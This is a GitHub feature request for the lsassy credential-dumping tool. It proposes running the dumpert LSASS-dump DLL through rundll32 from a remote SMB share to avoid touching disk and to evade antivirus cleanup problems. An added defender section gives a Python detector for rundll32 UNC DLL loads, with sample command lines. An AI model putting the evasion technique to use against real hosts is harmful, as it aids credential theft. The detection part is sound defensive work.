[Feature] Optionally use UNC path with dumpertdll module to run dumpert DLL from SMB share #61
Labels: enhancement (New feature or request)
Hello! First I would like to say congratulations on the 3.0.0 release, the new improvements look awesome! I had an idea while reading some of the new dumping methods, specifically dumpertdll.
rundll32 can run DLLs from SMB shares, they don't have to be on the disk. My idea was to run an SMB share (like with Samba or impacket-smbshare, not lsassy) and then place the dumpert DLL file in that share. You could then provide the UNC path to the dumpert DLL in the "dumpertdll_path" option, and lsassy would tell rundll32 to call the dumpert DLL from the SMB share, instead of having to upload it.

I've had lots of luck with this method when trying to spawn sliver agents using a DLL loaded from an SMB share, and it would also prevent the OPSEC hit of having to upload the file to disk. Finally, if something goes wrong during the dump (like AV gets wind of what you're doing) there is no risk of the dumpert DLL persisting after aborted execution because it couldn't be deleted.
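For defenders reading this request: because the DLL never touches the local disk, the rundll32 command line is where the UNC path stays visible. The following is an added detection sketch, not part of the issue or of lsassy; it assumes process-creation events exposed as dictionaries with `Computer` and `CommandLine` fields, and every host, share and file name in it is a constructed placeholder.

```python
import re

# rundll32, with or without directory, ".exe" and quotes, then its arguments.
RUNDLL32 = re.compile(r'(?i)(?:^|[\\/"\s])rundll32(?:\.exe)?"?\s+(?P<args>.+)$')
# First argument is a UNC path: \\host\share\path.dll[,EntryPoint]
UNC_DLL = re.compile(
    r'^"?[\\/]{2}(?P<host>[^\\/\s",]+)[\\/](?P<share>[^\\/\s",]+)[\\/](?P<path>[^",]+)'
)

def unc_dll_load(command_line, trusted_hosts=frozenset()):
    """Return (host, share, dll_path) when rundll32 is given a UNC DLL path."""
    m = RUNDLL32.search(command_line)
    if not m:
        return None
    target = UNC_DLL.match(m.group("args").lstrip())
    if not target:
        return None
    host = target.group("host").lower()
    if host in trusted_hosts:          # e.g. a known software-distribution server
        return None
    return host, target.group("share"), target.group("path").strip()

def scan(events, trusted_hosts=frozenset()):
    """Return (computer, host, share, dll_path) for every flagged event."""
    hits = []
    for ev in events:
        hit = unc_dll_load(ev["CommandLine"], trusted_hosts)
        if hit:
            hits.append((ev["Computer"], *hit))
    return hits

# Constructed sample events (not real telemetry); hosts and file names are placeholders.
SAMPLE_EVENTS = [
    {"Computer": "WS01", "CommandLine":
        r"C:\Windows\System32\rundll32.exe \\192.0.2.10\share\example.dll,EntryPoint"},
    {"Computer": "WS02", "CommandLine":
        r'"C:\Windows\System32\rundll32.exe" "\\FS01\tools\example.dll",EntryPoint'},
    {"Computer": "WS03", "CommandLine":
        r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"Computer": "WS04", "CommandLine": r"cmd.exe /c dir \\192.0.2.10\share"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS, trusted_hosts={"fs01"}):
        print("rundll32 loading DLL from UNC path:", hit)
```

This only sees UNC paths that appear literally on the command line; a DLL reached through a mapped drive letter would need correlation with network-share or image-load telemetry instead.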